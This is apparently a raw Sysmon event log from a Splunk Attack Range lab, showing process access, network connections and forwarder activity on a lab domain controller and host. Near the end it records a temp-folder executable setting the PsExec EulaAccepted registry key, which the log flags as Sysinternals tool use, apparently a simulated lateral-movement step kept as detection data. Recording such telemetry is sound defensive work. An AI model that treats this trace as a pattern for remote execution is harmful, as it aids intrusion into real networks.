11:07:03.949{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295542Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:03.949{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295541Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:03.949{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-1557-6216-C906-000000003802}6360C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295540Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:03.949{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1557-6216-C906-000000003802}6360C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000295539Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:03.950{C8EA50B7-1557-6216-C906-000000003802}6360C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000295538Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:03.911{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=442D9EFD57D044915E1DEE96CA3C460B,SHA256=E3A947311DBAF157A7B76A28B2FD3F06146AC574E640C913DFDD538221FE57C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295547Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:04.913{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB93C37AF8E18A8314F4B3652F40AAC2,SHA256=4B9E0AAD8DFD70B5A272BE9366DD8AAE1CB0850D57557282A7C707D5124B9234,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219680Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:02.070{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx55140-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000295550Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:05.928{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC7A22E206EE466FE586C5C8FDBBECC3,SHA256=FDDF983EACF4296E22FCCE120DF469D9CD7F490F8111FA0E5ACD43CF528280C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219682Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:05.271{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8997124B1DB1ADAB9FD886FB9FCE9E64,SHA256=AE4E7E11F5E5D1EB91F50E4EE8DC679BA3FDDD97C0C08CA08C3FB6A96B47B134,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219681Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:05.100{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E7A869302F73A35390B1155FF5C8070,SHA256=E339328724791015CD4EAD903E64F038E1DDA59FB4209352CA3D3C6E8CF61EE1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295549Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:03.354{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49244-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000295548Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:03.354{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49244-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000295551Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:06.945{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7C04AC57F064B5FBC8AC2341415F907,SHA256=0F9E233D5159E361F9CE4360B0D513B65CBA5DA88A90FB6DF7589C0D5ABEB665,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219683Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:06.131{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BFA447F6AFD8EF10DC1E7FDE91C42BD,SHA256=9FC0303B63250E5079AEA396A9AC48603047D1BB062C0A3962D38F88B015DDF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295553Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:07.946{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F1E2EBF7C6667B9F838C33B41A087EB,SHA256=863138E052392367AE97CC55AEE85A7F22C2BBA61E50827DAACAA1F50443B861,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219685Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:04.580{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51533-false10.0.1.12-8000- 23542300x8000000000000000219684Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:07.209{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80075A5ECBA70F9ACE2345C0B73F3BCE,SHA256=62F7A1E283AE4809BB57FDB51CC9DB36188EABBCCFFF0E39AFA85669ACB08701,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295552Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:05.732{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49245-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000295554Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:08.967{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58042688E70778B363A2BF96AD24454F,SHA256=1EBE96195ECC9C1FD36066D9B4BE3AC4F2029E821AA8F88E05C29EF3CF686C64,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219688Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:08.490{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DA22365686FF807F3A728F1A6DBBC2F2,SHA256=D38789B6B71CC57CC07A112B0B1020C3EADE2C33F165A0B045D2250425053C95,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219687Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:05.417{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx49410-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000219686Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:08.240{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60DDE4590CB49BC62DE7F614971A2CAA,SHA256=DFD20F9B009E77D7FEDD67D2962672DDCAF6718E17FCF61C6A8603BD211B9182,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295555Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:09.983{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C818A41D88826EC37CFF065FB79E2F7,SHA256=608BEC5CBEE3BC2CFF006C939F1A626BA9B70B5A1F661258D0282F56B8335524,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219689Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:09.334{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5273EE9B577FD8685C58B9BD56F95E50,SHA256=0355608A58B8C19902F9DBE55E38ADBFE389AF037AC35979B0C5E1D82024B04F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295556Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:10.986{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=754596350C83647DA34E8A13E95ED49B,SHA256=9526753CCA0F6270B58EA137F918D99EDE35BF51FD56B870A0B1629EA4727593,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219690Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:10.365{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3713B99C6624728FDAA3D95F4FE9F18,SHA256=A5A56A345F72746BF09E279B807F51D24039B5E1C0083DC0AC306C3AD19047BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219693Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:11.693{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A8D72C5729F668A012E86FB43DB5257F,SHA256=D66779C203D1180C735DD664B4B17A0ED99D76DF4FF986A88DBD09C74CE94C00,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219692Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:08.501{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx59883-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000219691Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:11.428{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F8C0F6AF5D0679B2D67DAB1248B290B,SHA256=06092F4224B3F067F3DC76F1535D6FE1FCFA694BF861050763C78767D82FE510,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219695Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:09.611{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51534-false10.0.1.12-8000- 23542300x8000000000000000219694Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:12.537{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FF66A1FB2CD2E8FC54864522C9FD861,SHA256=E197424A6A925A41B41CB13088CA208A2CFA3775200B2B5A8D48B739FC4D833A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295574Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:12.865{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1560-6216-CA06-000000003802}6984C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295573Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:12.864{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1560-6216-CA06-000000003802}6984C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000295572Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 11:07:12.772{C8EA50B7-1560-6216-CA06-000000003802}6984C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000295571Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:12.601{C8EA50B7-F11F-6215-1000-000000003802}364764C:\Windows\system32\svchost.exe{C8EA50B7-1560-6216-CB06-000000003802}6920C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295570Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:12.601{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1560-6216-CB06-000000003802}6920C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295569Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:12.548{C8EA50B7-1560-6216-CB06-000000003802}69204888C:\Windows\system32\conhost.exe{C8EA50B7-1560-6216-CA06-000000003802}6984C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295568Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:12.485{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-1560-6216-CB06-000000003802}6920C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295567Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:12.448{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1560-6216-CB06-000000003802}6920C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295566Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:12.317{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295565Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:12.317{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295564Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 